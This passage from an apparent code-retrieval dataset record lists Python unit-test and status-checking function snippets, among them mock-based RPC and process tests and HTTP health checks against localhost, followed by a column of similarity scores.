False\n result = {\n 'fake-prop': 'fake-value',\n }\n\n # Prepare mocks\n ensure_present_func.return_value = (changed, result)\n\n # Exercise code\n actual_changed, actual_result = zhmc_nic.perform_task(\n params, check_mode)\n\n # Assert return values\n assert actual_changed == changed\n assert actual_result == result\n\n # Assert call to the desired action function\n assert ensure_present_func.call_args == mock.call(params, check_mode)\n\n # Assert no call to the other action functions\n assert ensure_absent_func.called is False", "def test__get_runnable_success(self):\n\n resource = Mock()\n resource._get_runnable = BaseResource._get_runnable.__get__(resource, BaseResource)\n\n resource._get_runnable('a_runnable')\n resource.api.get_runnable.assert_called_once_with('a_runnable')\n resource.api.get_runnable.return_value.assert_called_once_with(resource.request)", "def test_get_task_success(self):\n task_id = util.MOCK_UUID_1\n\n rv = TEST_CLIENT.get(f\"/tasks/{task_id}\")\n result = rv.json()\n\n expected = util.MOCK_TASK_1\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)", "def jobHealthy(self, count):\n job = self.tester.submission_result.job\n for idx in range(count - 1):\n if (job.health == 'healthy'):\n return True\n print(\"health check fail : %d\" % idx )\n time.sleep(1)\n job.refresh()\n self.assertEqual('healthy', job.health)\n return False", "def test_execute_check_http(delay):\n port = port_for.select_random()\n good_path = '/good_path'\n\n check = check_http('http://127.0.0.1:%s%s' % (port, good_path))\n check_bad_path = check_http('http://127.0.0.1:%s/bad_path' % port) # This request will not return 200.\n\n assert check() is False\n assert check_bad_path() is False\n\n process = execute(\n [SERVICE, '--delay', str(delay), 'http', '--port', str(port), '--path', good_path],\n [check],\n timeout=1 + delay)\n assert check() is True\n assert check_bad_path() is False\n\n assert process.poll() is None\n process.kill()", "def getStatus(self, test_mngr_initr):\n self.test_mngr_initr = test_mngr_initr\n self.processTask()\n\n return self.__status", "def test_all_process_info(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'serial.return_value': {'name': 'proc_2'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_all_process_info())\n self.assertEqual([call()], mocked_check.call_args_list)", "def test_site_checker():\n\n regexps = [Regexp(id=0, regexp=\"200 OK\"),\n Regexp(id=1, regexp=\".*OK$\"),\n Regexp(id=2, regexp=\"^200\"),\n Regexp(id=3, regexp=\"^Failure\")]\n site = Site(id=SITE_ID,\n url=\"http://httpstat.us/200\",\n regexps=regexps)\n checker = SiteChecker(site, 60)\n completed = threading.Event()\n\n test = {SITE_ID: None}\n\n def on_check_complete_cb(site_id, status_code, response_time, failed_regexps):\n \"\"\" Callback function provided to SiteChecker \"\"\"\n test[site_id] = {'status_code': status_code,\n 'response_time_ms': response_time,\n 'failed_regexps': failed_regexps}\n completed.set()\n\n checker.start(on_check_complete_cb)\n\n while not completed.isSet():\n completed.wait(3)\n break\n\n checker.stop()\n\n assert len(test) == 1\n assert test[SITE_ID] is not None\n assert test[SITE_ID]['status_code'] == 200\n assert test[SITE_ID]['response_time_ms'] is not None\n assert test[SITE_ID]['response_time_ms'] > 0\n print(\"Failed: {}\".format(test[SITE_ID]['failed_regexps']))\n assert test[SITE_ID]['failed_regexps'] == [3]", "def test_ifServicesAreRunning():\n for name in config.toTest:\n testConfig = dynamicallyLoadModule(name)\n if \"service\" in testConfig.config:\n print \"Service: \"+ testConfig.config[\"name\"]\n if sys.platform.startswith(\"darwin\"):\n yield assertionFunctions.checkIfServiceIsRunning_OSX, testConfig.config\n elif sys.platform.startswith(\"linux\"):\n yield assertionFunctions.checkIfServiceIsRunning_Linux, testConfig.config\n else:\n assert False, str(sys.platform)+\": Not supported!\"", "async def test_at_start_when_running_awaitable(hass):\n assert hass.state == core.CoreState.running\n assert hass.is_running\n\n calls = []\n\n async def cb_at_start(hass):\n \"\"\"Home Assistant is started.\"\"\"\n calls.append(1)\n\n start.async_at_start(hass, cb_at_start)\n await hass.async_block_till_done()\n assert len(calls) == 1\n\n hass.state = core.CoreState.starting\n assert hass.is_running\n\n start.async_at_start(hass, cb_at_start)\n await hass.async_block_till_done()\n assert len(calls) == 2", "def test_success_result(self):\n dr = EventualResult(succeed(123), None)\n self.assertEqual(dr.wait(0.1), 123)", "def test_get_status(self):\n resp = self.build_api.getStatus().json()\n assert 'status' in resp\n assert 'message' in resp", "def test_successful(self):\n\n url = '/%s/job-types/status/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 4)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job1.job_type.name)\n self.assertEqual(result['results'][0]['job_counts'][0]['count'], 1)", "def check_status(status):\n if status == 'success':\n return True\n return False", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", self.helper_thread.test_test_ports , ( ) )", "def testSuccess(self):\n seq_num = 9\n request = struct.pack(HEADER_FMT, REQUEST_TYPE, seq_num)\n reply = self.sendAndReceive(request)\n reply_type, replied_seq_num = struct.unpack(HEADER_FMT,\n reply[0:HEADER_SIZE])\n self.assertEqual(REPLY_TYPE, reply_type)\n self.assertEqual(seq_num, replied_seq_num)\n metrics = json.loads(reply[HEADER_SIZE:])\n self.assertEqual([], metrics['Components'])", "def test_calls_success_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n\n def do_things():\n call_count.append(1)\n\n work = Async(target=dir, args=[1],\n callbacks={'success': do_things})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(call_count))", "def check_summary_status(cls, task_id, req, app):\n with app.app_context():\n from app import db\n try:\n status_url = cls.dvs_api_v1 + '/bulkstatus/' + task_id\n response = requests.post(url=status_url)\n state = response.json().get('state')\n while state == 'PENDING':\n time.sleep(60)\n response = requests.post(url=status_url)\n state = response.json().get('state')\n app.logger.info('task_id:{0}-request_id:{1}-status:{2}'.\n format(task_id, req.id, state))\n time.sleep(20)\n response = requests.post(url=status_url)\n result = response.json().get('result')\n req.summary = json.dumps({'summary': result})\n req.report = result.get('compliant_report_name')\n req.update_report_status('Processed')\n req.save()\n db.session.commit()\n app.logger.info('task_id:{0}-request_id:{1}-status:COMPLETED'.\n format(task_id, req.id, state))\n cls.copy_report(req)\n except Exception as e:\n app.logger.exception({\"error\": e, 'task_id': task_id, 'response': response.json() or None})\n db.session.rollback()\n req.update_report_status('Failed')\n db.session.commit()", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "def _assert_single_subtask_status(self, entry, succeeded, failed=0, skipped=0, retried_nomax=0, retried_withmax=0):\r\n subtask_info = json.loads(entry.subtasks)\r\n # verify subtask-level counts:\r\n self.assertEquals(subtask_info.get('total'), 1)\r\n self.assertEquals(subtask_info.get('succeeded'), 1 if succeeded > 0 else 0)\r\n self.assertEquals(subtask_info.get('failed'), 0 if succeeded > 0 else 1)\r\n # verify individual subtask status:\r\n subtask_status_info = subtask_info.get('status')\r\n task_id_list = subtask_status_info.keys()\r\n self.assertEquals(len(task_id_list), 1)\r\n task_id = task_id_list[0]\r\n subtask_status = subtask_status_info.get(task_id)\r\n print(\"Testing subtask status: {}\".format(subtask_status))\r\n self.assertEquals(subtask_status.get('task_id'), task_id)\r\n self.assertEquals(subtask_status.get('attempted'), succeeded + failed)\r\n self.assertEquals(subtask_status.get('succeeded'), succeeded)\r\n self.assertEquals(subtask_status.get('skipped'), skipped)\r\n self.assertEquals(subtask_status.get('failed'), failed)\r\n self.assertEquals(subtask_status.get('retried_nomax'), retried_nomax)\r\n self.assertEquals(subtask_status.get('retried_withmax'), retried_withmax)\r\n self.assertEquals(subtask_status.get('state'), SUCCESS if succeeded > 0 else FAILURE)", "def check_indicator_files(tasks):\n\n for task in tasks:\n if task[\"status\"]==\"unknown\":\n if os.path.exists(task[\"result\"]):\n task[\"status\"]=\"previously completed\"\n else:\n task[\"status\"]=\"to do\"\n return" ]
[ "0.6107858", "0.6048469", "0.6048469", "0.60329425", "0.5998805", "0.59744084", "0.59617215", "0.59564376", "0.5914125", "0.5885923", "0.5870812", "0.58333784", "0.58272076", "0.5810825", "0.5786063", "0.57617617", "0.57480896", "0.5696804", "0.5684844", "0.5677295", "0.56715876", "0.56701237", "0.56689763", "0.56664574", "0.5665494", "0.5630704", "0.56075156", "0.5601005", "0.5594014", "0.5585465", "0.5581442", "0.5579213", "0.55323386", "0.55314213", "0.5526712", "0.5524931", "0.551977", "0.5508211", "0.54988164", "0.5479387", "0.54743737", "0.5465123", "0.5463767", "0.54633766", "0.54606503", "0.54563564", "0.54536116", "0.54520935", "0.54503256", "0.54454976", "0.5440115", "0.543384", "0.5430491", "0.542603", "0.54151464", "0.5408163", "0.5406186", "0.5399829", "0.539579", "0.5395137", "0.53902066", "0.5381927", "0.53794307", "0.53751993", "0.5359435", "0.5355414", "0.5355136", "0.5350556", "0.534995", "0.53450185", "0.53138757", "0.53129554", "0.53126025", "0.53071576", "0.5306887", "0.5305626", "0.5301092", "0.53008324", "0.52997166", "0.5287077", "0.52867854", "0.5286601", "0.52857065", "0.5285519", "0.52827716", "0.5282406", "0.5282381", "0.5277721", "0.5275234", "0.5274899", "0.5268453", "0.5267966", "0.52650005", "0.52627873", "0.5260903", "0.5257482", "0.52566683", "0.525523", "0.52406687", "0.5239075" ]
0.81807953
0
Test if there is a 'result' property containing the result of registry process Test uses start_call_fx fixture
def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') job_id = response.data.get('job_id') job = client.get(job_id) result = job.json() assert result.get('result') registry_url = json.loads(result.get('result')) assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_starts_returned_context(self):\n from furious.context.context import Context\n from furious.processors import _handle_results\n\n processor = Mock()\n processor.return_value = Mock(spec=Context)\n\n _handle_results({'_process_results': processor})\n\n processor.return_value.start.assert_called_once_with()", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def test_all_process_info(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'serial.return_value': {'name': 'proc_2'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_all_process_info())\n self.assertEqual([call()], mocked_check.call_args_list)", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_check_process_output(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def test_start_args(self, mocked_check, mocked_proc):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n info_source = self.supervisor.supvisors.info_source\n info_source.update_extra_args.side_effect = KeyError\n info_source.supervisor_rpc_interface.startProcess.side_effect = [\n RPCError(Faults.NO_FILE, 'no file'),\n RPCError(Faults.NOT_EXECUTABLE),\n RPCError(Faults.ABNORMAL_TERMINATION),\n 'done']\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with extra arguments and a process that is not compliant\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_EXTRA_ARGUMENTS, exc.exception.code)\n self.assertEqual(\"BAD_EXTRA_ARGUMENTS: rules for namespec appli:proc\"\n \" are not compatible with extra arguments in command line\",\n exc.exception.text)\n self.assertEqual(0, mocked_check.call_count)\n self.assertEqual(0, info_source.update_extra_args.call_count)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n # test RPC call with extra arguments and a process that is compliant\n # but unknown in Supervisor\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual(\"BAD_NAME: namespec appli:proc unknown in this Supervisor instance\",\n exc.exception.text)\n self.assertEqual([call('appli:proc', 'dummy arguments')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n info_source.update_extra_args.reset_mock()\n info_source.update_extra_args.side_effect = None\n # test RPC call with start exceptions\n mocked_proc.side_effect = None\n mocked_proc.return_value = None, None\n # NO_FILE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc')\n self.assertEqual(Faults.NO_FILE, exc.exception.code)\n self.assertEqual(\"NO_FILE: no file\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', True)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NO_FILE: no file')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # NOT_EXECUTABLE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.NOT_EXECUTABLE, exc.exception.code)\n self.assertEqual(\"NOT_EXECUTABLE\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NOT_EXECUTABLE')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # other exception doesn't trigger an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual(\"ABNORMAL_TERMINATION\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual(0, info_source.force_process_fatal.call_count)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # finally, normal behaviour\n self.assertEqual('done', rpc.start_args('appli:proc'))", "def test_runs_given_function(self):\n from furious.processors import _handle_results\n\n processor = Mock()\n\n _handle_results({'_process_results': processor})\n\n processor.assert_called_once_with()", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_run_started(self):", "def process_test_start(self, config, results, result_id, db):\n pass", "def startTestRun(self):", "def __call__(self, result = None):\r\n if result != None:\r\n self.result = result\r\n else:\r\n self.result = core.FW_conf['connection'].getResult()\r\n assert self.result, 'Internal error: test result is missing from Phone Manager instance!'\r\n\r\n core.FW_conf['connection'].currentTcId = self.tcId\r\n for remote in core.FW_conf['remote_connection']:\r\n remote.setResult(self.result)\r\n remote.currentTcId = self.tcId\r\n\r\n self.result.startTest(self)\r\n\r\n # add comment to test report whether we are in WhiteBox/HW Assisted WhiteBox mode\r\n self.comment('Executing test case in %s mode' % (core.FW_conf['blackbox_enabled'] and 'HW Assisted WhiteBox' or 'WhiteBox'))\r\n\r\n # add test case information for bltue report\r\n self.addBltueTestCase(self.tcId)\r\n\r\n try:\r\n # Code inside the next try-except -block must not raise exceptions.\r\n # All exception handling must be done within the logApply method.\r\n try:\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _setUp\r\n self.comment('%s MARBLE SETUP %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inSetUp = True\r\n resp = self.logApply(self._setUp)\r\n finally:\r\n self._inSetUp = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n if resp == False or self.result.wasSkipped():\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n # return because setup failed\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's setUp\r\n if 'setUp' in dir(self):\r\n self.comment('%s TEST CASE SETUP %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseSetUp = True\r\n resp = self.logApply(self.setUp)\r\n finally:\r\n self._inTestCaseSetUp = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n if resp == False or self.result.wasSkipped():\r\n # test case setup failed\r\n\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postTearDown\r\n try:\r\n self._inPostTearDown = True\r\n resp = self.logApply(self._postTearDown)\r\n finally:\r\n self._inPostTearDown = False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's tearDown\r\n if 'tearDown' in dir(self):\r\n self.comment('%s TEST CASE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseTearDown = True\r\n resp = self.logApply(self.tearDown)\r\n finally:\r\n self._inTestCaseTearDown = False\r\n\r\n if resp == False:\r\n self._warn('Failure during test case teardown!')\r\n\r\n # return because test case setup failed\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postSetUp\r\n try:\r\n self._inPostSetUp = True\r\n resp = self.logApply(self._postSetUp)\r\n finally:\r\n self._inPostSetUp = False\r\n\r\n # return if post setup fails\r\n if resp == False:\r\n self._warn('Failure during post setup!')\r\n return\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute the test method\r\n testMethod = getattr(self, self.testMethodName)\r\n self.comment('%s TEST CASE %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCase = True\r\n resp = self.logApply(testMethod)\r\n finally:\r\n self._inTestCase = False\r\n\r\n ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _tearDown\r\n self.comment('%s MARBLE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTearDown = True\r\n resp = self.logApply(self._tearDown)\r\n finally:\r\n self._inTearDown = False\r\n\r\n if ok: ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute possible test case's tearDown\r\n if 'tearDown' in dir(self):\r\n self.comment('%s TEST CASE TEARDOWN %s' % ((15 * '='), (15 * '=')))\r\n try:\r\n self._inTestCaseTearDown = True\r\n resp = self.logApply(self.tearDown)\r\n finally:\r\n self._inTestCaseTearDown = False\r\n\r\n if resp == False:\r\n self._warn('Failure during test case teardown!')\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # execute _postTearDown\r\n try:\r\n self._inPostTearDown = True\r\n resp = self.logApply(self._postTearDown)\r\n finally:\r\n self._inPostTearDown = False\r\n\r\n if ok: ok = resp != False\r\n\r\n # return if test execution should be stopped\r\n if core.FW_conf['should_stop']:\r\n return\r\n\r\n # Success!\r\n if not self.result.getError():\r\n if ok:\r\n self.result.addSuccess(self)\r\n if core.FW_conf['delete_success_blx'] and core.FW_conf['tracing_enabled'] and not core.FW_conf['memory_leak_detection']:\r\n #Delete successfull testcase blx if user doesn't need those\r\n core.FW_conf['trace'].deleteBlx = True\r\n except SystemExit:\r\n # put self._raiseSystemExit flag to True so that SystemExit\r\n # can be raised in finally:\r\n self._raiseSystemExit = True\r\n except Exception, e:\r\n # This is usually caused by an internal error, but could also\r\n # be a KeyboardInterrupt. In either case, stop testing is\r\n # needed here.\r\n self.logApply(self.stop, e)\r\n finally:\r\n # raise SystemExit if needed\r\n if self._raiseSystemExit:\r\n raise\r\n\r\n for phone in core.FW_conf['connection']:\r\n if phone._createBugReport:\r\n phone.createBugReport()\r\n\r\n if core.FW_conf['settings'].TestRun.TakeHeapDumps:\r\n core.FW_conf['connection'].takeHeapDumps()\r\n\r\n self._stopTest()", "def test_log_success(self, mock_info):\n\n with utils.log_activity(\"for test\"):\n pass\n\n mock_info.assert_any_call(\"[jaxline] %s starting...\", \"for test\")\n mock_info.assert_any_call(\"[jaxline] %s finished.\", \"for test\")", "def test_runs_returned_async(self):\n from furious.async import Async\n from furious.processors import _handle_results\n\n processor = Mock()\n processor.return_value = Mock(spec=Async)\n\n _handle_results({'_process_results': processor})\n\n processor.return_value.start.assert_called_once_with()", "def test_process_info(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test first RPC call with process namespec\n self.assertEqual([{'name': 'proc'}], rpc.get_process_info('appli:proc'))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:proc')], 